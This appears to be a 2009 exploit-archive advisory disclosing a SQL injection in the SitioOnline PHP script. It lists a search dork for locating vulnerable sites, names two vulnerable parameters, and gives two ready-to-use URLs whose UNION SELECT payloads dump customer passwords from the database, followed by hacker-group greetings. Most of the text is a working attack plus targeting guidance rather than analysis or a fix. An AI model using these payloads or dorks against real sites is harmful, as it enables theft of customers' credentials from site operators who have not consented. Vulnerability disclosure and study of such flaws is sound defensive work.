[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SitioOnline SQL Injection Vulnerability
# Published : 2009-12-15
# Author : 4lG3r14n0-t3r0
# Previous Title : Ez News Manager / Pro CSRF Change Admin Password
# Next Title : Ez Faq Maker Multiple Vulnerabilities


**********************- cvs -vrew ***********************

[!]            SitioOnline SQL Injection Vulnerability
[!] Author    : 4lG3r14n0-t3r0
[!] MAIL      : v5@hotmail.de

***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.SitioOnline.cl
[+] script   : SitioOnline
[+] Download :
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"lista_articulos.php?id_categoria="
    or Powered by SitioOnline.com


**************************************************************************/
[ Vulnerable File ]

http://server/lista_articulos.php?id_categoria=

http://server/detalle_articulo.php?id_producto=

[ Exploit ]

[1]

http://server/lista_articulos.php?id_categoria=42+union+select+1,customers_password+from+customers--


[2]


http://server/detalle_articulo.php?id_producto=-7+union+select+1,customers_password+from+customers--

[  Greets ]

[+] :cvs crew : ange78 , saf1-casanova,jess-injection,ijection-master,dark-master , alqaiser, u$er-maskine  , ALL HACKERS MUSLIMS

& all members of : tryag.cc , hackteach.org

made in algeria

N'est pas mort ce qui à jamais dort
________________________________
PC, téléphones portables, souris hi-tech. à gagner grace à Hotmail ! C'est ici !<http://www.hotmailmagicmoment.com>